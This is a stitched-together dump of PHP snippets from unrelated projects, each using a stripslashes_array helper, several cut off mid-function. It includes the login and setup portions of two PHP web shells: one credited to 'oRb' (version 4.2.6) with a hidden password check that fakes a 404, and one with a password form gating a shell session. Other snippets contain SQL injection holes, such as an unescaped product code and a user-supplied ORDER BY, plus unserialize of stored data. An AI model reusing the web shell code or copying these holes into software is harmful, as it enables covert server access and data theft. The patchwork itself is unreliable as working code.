function strip_request_slashes() { $_COOKIE = stripslashes_array($_COOKIE); $_GET = stripslashes_array($_GET); $_POST = stripslashes_array($_POST); $_REQUEST = stripslashes_array($_REQUEST); }
function fetch_data() { global $dbh; $this->p_perso = new parametres_perso("empr"); $this->circ_tpl = array(); $this->piedpage = ""; $requete = "select * from serialcirc where id_serialcirc=" . $this->id; $resultat = pmb_mysql_query($requete); if (pmb_mysql_num_rows($resultat)) { $r = pmb_mysql_fetch_object($resultat); if ($r->serialcirc_tpl) { //On va récupérer le template prédéfini if ($r->serialcirc_tpl + 0 > 0) { $query = "select * from serialcirc_tpl where serialcirctpl_id=" . $r->serialcirc_tpl; $res = pmb_mysql_query($query, $dbh); if ($res) { $row = pmb_mysql_fetch_object($res); if ($row->serialcirctpl_tpl) { $this->circ_tpl = stripslashes_array(unserialize($row->serialcirctpl_tpl)); $this->piedpage = $row->serialcirctpl_piedpage; } } } else { $this->circ_tpl = stripslashes_array(unserialize($r->serialcirc_tpl)); $this->piedpage = $r->serialcirc_piedpage; } } } }
/** * 获取循单操作 * * @param array $data * * @return 循单操作 */ function search_product_by_bn($data) { $data = stripslashes_array($data); $member = array(); $result['alert_num'] = $this->system->getConf('system.product.alert.num'); $products = array(); $product_list = json_decode($data['bns']); $dealer_id = $data['dealer_id']; $arr_goods_list = array(); $obj_member = $this->load_api_instance('verify_member_valid', '2.0'); $obj_member->verify_member_valid($dealer_id, $member); //根据经销商ID验证会员记录有效性 $obj_payments = $this->load_api_instance('search_payments_by_order', '2.0'); foreach ($product_list as $bn) { //$bn = str_replace('\\','',$bn); $status = 'normal'; if ($product = $this->db->selectrow('select goods_id,product_id,price,store,freez,name,pdt_desc,weight from sdb_products where bn="' . $bn . '"')) { if (!isset($arr_goods_list[$product['goods_id']])) { $goods = $this->db->selectrow('select goods_id,cat_id,brand_id,marketable,disabled from sdb_goods where goods_id=' . $product['goods_id']); if ($goods) { $arr_goods_list[] = $goods; } } else { $goods = $arr_goods_list[$product['goods_id']]; } if (!$goods || $goods['disabled'] == 'true') { $status = 'deleted'; } if ($goods['marketable'] == 'false') { $status = 'shelves'; } if (is_null($product['store'])) { $product['store'] = $product['store']; } else { $product['store'] = $product['store'] - $product['freez']; } $product['link'] = $this->system->base_url() . "index.php?ctl=product&p[0]=" . $product['goods_id']; unset($product['freez']); } else { $status = 'deleted'; } $product['price'] = $obj_payments->changer($this->get_product_lv_price($member['member_lv_id'], $product['product_id'], $product['price'])); //获取该会员下的等级价格 $product['bn'] = $bn; $product['status'] = $status; $goods = $this->db->selectrow("SELECT thumbnail_pic FROM sdb_goods WHERE goods_id=" . $product['goods_id']); $thumbnail_pic = explode("|", $goods['thumbnail_pic']); $product['thumbnail_pic'] = empty($goods['thumbnail_pic']) ? "" : (count($thumbnail_pic) == 3 ? $this->system->base_url() . $thumbnail_pic[0] : $thumbnail_pic[0]); unset($product['goods_id']); unset($product['product_id']); $products[] = $product; } $obj_product_line = $this->load_api_instance('search_product_line', '2.0'); $obj_product_line->checkDealerPurview($member, $arr_goods_list); //检查会员的代销权限 $result['data_info'] = $products; $this->api_response('true', false, $result); }
function strip_all_slashes() { if (get_magic_quotes_gpc()) { stripslashes_array($_GET, true); stripslashes_array($_POST, true); stripslashes_array($_COOKIE, true); stripslashes_array($_REQUEST, true); } }
function stripslashes_array(&$arr) { foreach ($arr as &$val) { if (is_array($val)) { $val = stripslashes_array($val); } else { $val = stripslashes($val); } } }
function undoMagic($data) { if (!get_magic_quotes_gpc()) { return $data; } if (ini_get('magic_quotes_sybase') != 1) { return stripslashes_array($data); } else { return undoSybaseQuotes_array($data); } }
function stripslashes_array($data) { if (is_array($data)) { foreach ($data as $key => $value) { $data[$key] = stripslashes_array($value); } return $data; } else { return stripslashes($data); } }
function stripslashes_array(&$array, $iterations = 0) { if ($iterations < 3) { foreach ($array as $key => $value) { if (is_array($value)) { stripslashes_array($array[$key], $iterations + 1); } else { $array[$key] = stripslashes($array[$key]); } } } }
function stripslashes_array($array) { $rs = array(); while (list($key, $val) = @each($array)) { if (is_array($val)) { $rs[$key] = stripslashes_array($val); } else { $rs[$key] = stripslashes($val); } } return $rs; }
function fetch_data() { $this->p_perso = new parametres_perso("empr"); $this->circ_tpl = array(); $requete = "select * from serialcirc where id_serialcirc=" . $this->id; $resultat = mysql_query($requete); if (mysql_num_rows($resultat)) { $r = mysql_fetch_object($resultat); if ($r->serialcirc_tpl) { $this->circ_tpl = stripslashes_array(unserialize($r->serialcirc_tpl)); } } }
function stripslashes_array(&$array) { if (is_array($array)) { foreach ($array as $k => $v) { $array[$k] = stripslashes_array($v); } } else { if (is_string($array)) { $array = stripslashes($array); } } return $array; }
function stripslashes_array(&$array) { if (is_array($array)) { $keys = array_keys($array); foreach ($keys as $key) { if (is_array($array[$key])) { stripslashes_array($array[$key]); } else { $array[$key] = stripslashes($array[$key]); } } } }
function array_stripslashes(&$array) { if (!is_array($array)) { return false; } while (list($key) = each($array)) { if (is_array($array[$key])) { stripslashes_array($array[$key]); } else { $array[$key] = stripslashes($array[$key]); } } }
/** * stripslashes 取消转义 数组 * * 1 参数 输入数组 * * 返回值 处理后的数组 **/ function stripslashes_array($value) { if (is_array($value)) { $value = array_map(__FUNCTION__, $value); } elseif (is_object($value)) { $vars = get_object_vars($value); foreach ($vars as $key => $data) { $value->{$key} = stripslashes_array($data); } } else { $value = stripslashes($value); } return $value; }
function fetch_data() { global $dbh; $this->p_perso = new parametres_perso("empr"); $this->circ_tpl = array(); $requete = "select * from serialcirc_tpl where serialcirctpl_id=" . $this->id; $resultat = pmb_mysql_query($requete, $dbh); if (pmb_mysql_num_rows($resultat)) { $r = pmb_mysql_fetch_object($resultat); if ($r->serialcirctpl_tpl) { $this->circ_tpl = stripslashes_array(unserialize($r->serialcirctpl_tpl)); } } }
function stripslashes_array(&$array) { while (list($key, $var) = each($array)) { if ($key != 'argc' && $key != 'argv' && (strtoupper($key) != $key || '' . intval($key) == "{$key}")) { if (is_string($var)) { $array[$key] = stripslashes($var); } if (is_array($var)) { $array[$key] = stripslashes_array($var); } } } return $array; }
function stripslashes_array(&$arr) { foreach ($arr as $k => &$v) { $nk = stripslashes($k); if ($nk != $k) { $arr[$nk] =& $v; unset($arr[$k]); } if (is_array($v)) { stripslashes_array($v); } else { $arr[$nk] = stripslashes($v); } } }
/** * stripslashes_array * Recursive function to remove slashes from an array or single keyword. * * @param array If the parameter is an array it will be called recursively. Will eventually just stripslashes from the keys and values for each element. * * @return mixed Returns either an array or string - depending on what was passed in. */ function stripslashes_array($array) { if (is_array($array)) { $return = array(); foreach ($array as $key => $value) { $key = stripslashes($key); if (is_array($value)) { $return[$key] = stripslashes_array($value); continue; } $return[$key] = stripslashes($value); } } else { $return = stripslashes($array); } return $return; }
function params() { $params = array(); if (!empty($_POST)) { if (get_magic_quotes_gpc() == 1) { //echo "1"; $params = array_merge($params, stripslashes_array($_POST)); } else { //echo "2"; $params = array_merge($params, $_POST); } } if (!empty($_GET)) { if (get_magic_quotes_gpc() == 1) { $params = array_merge($params, stripslashes_array($_GET)); } else { $params = array_merge($params, $_GET); } } return $params; }
/** * Wrapper around stripslashes to handle arrays, with the advantage that you * can select which fields should be handled by htmlentities and with advantage, * that you can eliminate all slashes by setting complete=true * * @param array The subject array * @param int See php documentation about this * @param string See php documentation about this * @param string The fields which should be checked for, separated by spaces * @param bool Select true to use stripslashes_complete instead of stripslashes * @return array The array with stripslashe'd strings * @author Florian Lippert <*****@*****.**> */ function stripslashes_array($subject, $fields = '', $complete = false) { if (is_array($subject)) { if (!is_array($fields)) { $fields = array_trim(explode(' ', $fields)); } foreach ($subject as $field => $value) { if (!is_array($fields) || empty($fields) || is_array($fields) && !empty($fields) && in_array($field, $fields)) { /** * Just call ourselve to manage multi-dimensional arrays */ $subject[$field] = stripslashes_array($subject[$field], $fields, $complete); } } } else { if ($complete == true) { $subject = stripslashes_complete($subject); } else { $subject = stripslashes($subject); } } return $subject; }
// Strip slashes from GET/POST/COOKIE/REQUEST/FILES (if magic_quotes_gpc is enabled) if (!defined('FORUM_DISABLE_STRIPSLASHES') && get_magic_quotes_gpc()) { function stripslashes_array($array) { return is_array($array) ? array_map('stripslashes_array', $array) : stripslashes($array); } $_GET = stripslashes_array($_GET); $_POST = stripslashes_array($_POST); $_COOKIE = stripslashes_array($_COOKIE); $_REQUEST = stripslashes_array($_REQUEST); if (is_array($_FILES)) { // Don't strip valid slashes from tmp_name path on Windows foreach ($_FILES as $key => $value) { $_FILES[$key]['tmp_name'] = str_replace('\\', '\\\\', $value['tmp_name']); } $_FILES = stripslashes_array($_FILES); } } // If a cookie name is not specified in config.php, we use the default (luna_cookie) if (empty($cookie_name)) { $cookie_name = 'luna_cookie'; } // If the cache directory is not specified, we use the default setting if (!defined('FORUM_CACHE_DIR')) { define('FORUM_CACHE_DIR', FORUM_ROOT . 'cache/'); } // Define a few commonly used constants define('FORUM_UNVERIFIED', 0); define('FORUM_ADMIN', 1); define('FORUM_MOD', 2); define('FORUM_GUEST', 3);
// Force POSIX locale (to prevent functions such as strtolower() from messing up UTF-8 strings) setlocale(LC_CTYPE, 'C'); // Turn off magic_quotes_runtime if (get_magic_quotes_runtime()) { set_magic_quotes_runtime(0); } // Strip slashes from GET/POST/COOKIE (if magic_quotes_gpc is enabled) if (get_magic_quotes_gpc()) { function stripslashes_array($array) { return is_array($array) ? array_map('stripslashes_array', $array) : stripslashes($array); } $_GET = stripslashes_array($_GET); $_POST = stripslashes_array($_POST); $_COOKIE = stripslashes_array($_COOKIE); $_REQUEST = stripslashes_array($_REQUEST); } // If a cookie name is not specified in config.php, we use the default (forum_cookie) if (empty($cookie_name)) { $cookie_name = 'pun_cookie'; } // If the cache directory is not specified, we use the default setting if (!defined('FORUM_CACHE_DIR')) { define('FORUM_CACHE_DIR', PUN_ROOT . 'cache/'); } // Turn off PHP time limit @set_time_limit(0); // Define a few commonly used constants define('PUN_UNVERIFIED', 0); define('PUN_ADMIN', 1); define('PUN_MOD', 2);
} @ini_set('error_log', NULL); @ini_set('log_errors', 0); @ini_set('max_execution_time', 0); @set_time_limit(0); if (function_exists('set_magic_quotes_runtime')) { @set_magic_quotes_runtime(0); } @define('VERSION', '4.2.6'); if (get_magic_quotes_gpc()) { function stripslashes_array($array) { return is_array($array) ? array_map('stripslashes_array', $array) : stripslashes($array); } $_POST = stripslashes_array($_POST); $_COOKIE = stripslashes_array($_COOKIE); } /* (С) 11.2011 oRb */ if (!empty($▛)) { if (isset($_POST['pass']) && md5($_POST['pass']) == $▛) { prototype(md5($_SERVER['HTTP_HOST']), $▛); } if (!isset($_COOKIE[md5($_SERVER['HTTP_HOST'])]) || $_COOKIE[md5($_SERVER['HTTP_HOST'])] != $▛) { hardLogin(); } } if (!isset($_COOKIE[md5($_SERVER['HTTP_HOST']) . 'ajax'])) { $_COOKIE[md5($_SERVER['HTTP_HOST']) . 'ajax'] = (bool) $▘; } function hardLogin() {
header('HTTP/1.0 404 Not Found'); exit; } @session_start(); @error_reporting(0); @ini_set('error_log',NULL); @ini_set('log_errors',0); @ini_set('max_execution_time',0); @set_time_limit(0); @set_magic_quotes_runtime(0); @define('VERSION', '2'); if( get_magic_quotes_gpc() ) { function stripslashes_array($array) { return is_array($array) ? array_map('stripslashes_array', $array) : stripslashes($array); } $_POST = stripslashes_array($_POST); } function printLogin() { ?> <center> <form method=post> Password: <input type=password name=pass><input type=submit value='>>'> </form></center> <?php exit; } if( !isset( $_SESSION['sh_logined'] )) if( empty( $auth['md5pass'] ) || ( isset( $_POST['pass'] ) && ( md5($_POST['pass']) == $auth['md5pass'] ) ) ) $_SESSION['sh_logined'] = true;
function update($value, $force_creation = false) { global $dbh; global $msg, $charset; global $include_path; global $thesaurus_concepts_active; // nettoyage des valeurs en entrée $value['name'] = clean_string($value['name']); $value['issn'] = clean_string($value['issn']); if (!$value['parent']) { if ($value['publisher']) { //on les a, on crée l'éditeur $value['publisher'] = stripslashes_array($value['publisher']); //La fonction d'import fait les addslashes contrairement à l'update $value['parent'] = editeur::import($value['publisher']); } } if (!$value['name'] || !$value['parent']) { return false; } // construction de la requête $requete = 'SET collection_name="' . $value['name'] . '", '; $requete .= 'collection_parent="' . $value['parent'] . '", '; $requete .= 'collection_issn="' . $value['issn'] . '", '; $requete .= 'collection_web="' . $value['collection_web'] . '", '; $requete .= 'collection_comment="' . $value['comment'] . '", '; $requete .= 'index_coll=" ' . strip_empty_words($value['name']) . ' ' . strip_empty_words($value['issn']) . ' "'; if ($this->id) { // update $requete = 'UPDATE collections ' . $requete; $requete .= ' WHERE collection_id=' . $this->id . ' ;'; if (pmb_mysql_query($requete, $dbh)) { $requete = "update notices set ed1_id='" . $value[parent] . "' WHERE coll_id='" . $this->id . "' "; $res = pmb_mysql_query($requete, $dbh); // liens entre autorités $aut_link = new aut_link(AUT_TABLE_COLLECTIONS, $this->id); $aut_link->save_form(); $aut_pperso = new aut_pperso("collection", $this->id); $aut_pperso->save_form(); audit::insert_modif(AUDIT_COLLECTION, $this->id); } else { require_once "{$include_path}/user_error.inc.php"; warning($msg[167], htmlentities($msg[169] . " -> " . $this->display, ENT_QUOTES, $charset)); return FALSE; } } else { if (!$force_creation) { // création : s'assurer que la collection n'existe pas déjà if ($id_collection_exists = collection::check_if_exists($value)) { $collection_exists = new collection($id_collection_exists); require_once "{$include_path}/user_error.inc.php"; warning($msg[167], htmlentities($msg[171] . " -> " . $collection_exists->display, ENT_QUOTES, $charset)); return FALSE; } } $requete = 'INSERT INTO collections ' . $requete . ';'; if (pmb_mysql_query($requete, $dbh)) { $this->id = pmb_mysql_insert_id(); // liens entre autorités $aut_link = new aut_link(AUT_TABLE_COLLECTIONS, $this->id); $aut_link->save_form(); audit::insert_creation(AUDIT_COLLECTION, $this->id); } else { require_once "{$include_path}/user_error.inc.php"; warning($msg[167], htmlentities($msg[170] . " -> " . $requete, ENT_QUOTES, $charset)); return FALSE; } } // Indexation concepts if ($thesaurus_concepts_active == 1) { $index_concept = new index_concept($this->id, TYPE_COLLECTION); $index_concept->save(); } // Mise à jour des vedettes composées contenant cette autorité vedette_composee::update_vedettes_built_with_element($this->id, "collection"); if ($value['subcollections']) { for ($i = 0; $i < count($value['subcollections']); $i++) { $subcoll = stripslashes_array($value['subcollections'][$i]); //La fonction d'import fait les addslashes contrairement à l'update $subcoll['coll_parent'] = $this->id; subcollection::import($subcoll); } } //update authority informations $authority = new authority(0, $this->id, AUT_TABLE_COLLECTIONS); $authority->set_num_statut($value['statut']); $authority->update(); collection::update_index($this->id); return true; }
function get_news($params) { extract($params); $from = intval($from); $limit = intval($limit); $result = sql_query('SELECT * FROM news ORDER BY datetime DESC' . ($limit && $from < $limit ? ' LIMIT ' . $from . ',' . $limit : '')); $out = '<table width="100%">'; while ($row = mysql_fetch_assoc($result)) { $row = stripslashes_array($row); $out .= '<tr><td class="date" width="50">' . date('m/d/Y', $row['datetime']) . '</td><td class="news">' . htmlspecialchars($row['title']) . '</td></tr>'; $out .= $full ? '<tr><td colspan="2" style="padding-bottom:20px;">' . htmlspecialchars($row['text']) . '</td></tr>' : ''; } $out .= '</table>'; return $out; }
SUM(IF(t.type="r", t.amount, NULL)) as referral, SUM(IF(t.type="i", t.amount, NULL)) as reinvest, SUM(IF(t.type="b", t.amount, NULL)) as bonus FROM users LEFT JOIN translines as t ON t.user_id = users.id AND t.stamp < ' . Project::getInstance()->getNow() . ' AND t.status > 0 GROUP BY users.id ORDER BY ' . (!empty($_REQUEST['order_by']) ? addslashes($_REQUEST['order_by']) : 'reg_date DESC') . ' ' . get_limit() . ' '); $users = array(); while ($row = mysql_fetch_assoc($result)) { $row['ips'] = isset($ips[$row['id']]) ? $ips[$row['id']] : array(); $row['bads'] = isset($bads[$row['id']]) ? intval($bads[$row['id']]) : 0; $row['ipsec'] = 0; $users[$row['id']] = $row; } foreach ($users_by_ips as $ip => $u_ids) { if (count($u_ids) > 1) { foreach ($u_ids as $u_id) { if (!isset($users[$u_id])) { continue; } $users[$u_id]['ipsec'] = 1; $users[$u_id]['ips'][$ip] = '(' . implode(',', $u_ids) . ')'; } } } Project::getInstance()->getSmarty()->assign('pagination', pagination(sql_get('SELECT FOUND_ROWS()'))); Project::getInstance()->getSmarty()->assign('users', stripslashes_array($users)); Project::getInstance()->getSmarty()->display('../default/admin/users.tpl'); }
public static function get_values_from_form($instance_name, $property, $uri_item) { $datatypes = array(); $var_name = $instance_name . "_" . $property->pmb_name; global ${$var_name}; if (${$var_name} && count(${$var_name})) { global ${$var_name . "_is_composed"}; if (!${$var_name . "_is_composed"}) { // Ce n'est pas une vedette composée //On va supprimer une éventuelle vedette précédente global ${$var_name . "_composed"}; foreach (${$var_name . "_composed"} as $order => $data) { if ($data["id"]) { $vedette_composee = new vedette_composee($data["id"]); $vedette_composee->delete(); } } // On va chercher les valeurs actuelles foreach (${$var_name} as $order => $data) { $data = stripslashes_array($data); if ($data["value"]) { $data_properties = array(); if ($data["lang"]) { $data_properties["lang"] = $data["lang"]; } if ($data["type"] == "http://www.w3.org/2000/01/rdf-schema#Literal") { $data_properties["type"] = "literal"; } else { $data_properties["type"] = "uri"; } if ($data["display_label"]) { $data_properties["display_label"] = $data["display_label"]; } $class_name = get_called_class(); $datatypes[$property->uri][] = new $class_name($data["value"], $data["type"], $data_properties); } } } else { // C'est une vedette composée global ${$var_name . "_composed"}; foreach (${$var_name . "_composed"} as $order => $data) { $data = stripslashes_array($data); if ($data["elements"]) { $vedette_composee = new vedette_composee($data["id"]); if ($data["value"]) { $vedette_composee->set_label($data["value"]); } // On commence par réinitialiser le tableau des éléments de la vedette composée $vedette_composee->reset_elements(); // On remplit le tableau des éléments de la vedette composée foreach ($data["elements"] as $subdivision => $elements) { if ($elements["elements_order"] !== "") { $elements_order = explode(",", $elements["elements_order"]); foreach ($elements_order as $position => $num_element) { if ($elements[$num_element]["id"] && $elements[$num_element]["label"]) { $velement = $elements[$num_element]["type"]; $available_field_class_name = $vedette_composee->get_at_available_field_class_name($velement); if ($available_field_class_name['params']) { $vedette_element = new $velement($available_field_class_name['params'], $available_field_class_name["num"], $elements[$num_element]["id"], $elements[$num_element]["label"]); } else { $vedette_element = new $velement($available_field_class_name["num"], $elements[$num_element]["id"], $elements[$num_element]["label"]); } $vedette_composee->add_element($vedette_element, $subdivision, $position); } } } } $vedette_composee_id = $vedette_composee->save(); } if ($vedette_composee_id) { vedette_link::save_vedette_link($vedette_composee, onto_common_uri::get_id($uri_item), TYPE_CONCEPT_PREFLABEL); if ($data["value"]) { $data_properties = array(); if ($data["type"] == "http://www.w3.org/2000/01/rdf-schema#Literal") { $data_properties["type"] = "literal"; } else { $data_properties["type"] = "uri"; } $class_name = get_called_class(); $datatypes[$property->uri][] = new $class_name($data["value"], $data["type"], $data_properties); } } } } } return $datatypes; }
/** * Fetch * * This function will fetch a result from the result set passed in. * * @return mixed Returns false if the result is empty. Otherwise returns the next result. */ function Fetch($resource = null) { if (is_null($resource)) { $this->SetError('Resource is a null object'); return false; } if (!is_resource($resource)) { $this->SetError('Resource ' . $resource . ' is not really a resource'); return false; } return stripslashes_array(mysql_fetch_assoc($resource)); }
function connecteur_out_source($connector, $id, $msg) { global $dbh; $id += 0; $this->id = $id; $this->connector = $connector; $this->connector_id = $connector->id; $this->msg = $msg; if ($this->id) { $sql = "SELECT * FROM connectors_out_sources WHERE connectors_out_source_id = " . $id; $res = mysql_query($sql, $dbh); $row = mysql_fetch_assoc($res); $this->name = $row["connectors_out_source_name"]; $this->comment = $row["connectors_out_source_comment"]; $this->config = unserialize($row["connectors_out_source_config"]); $this->config = stripslashes_array($this->config); } }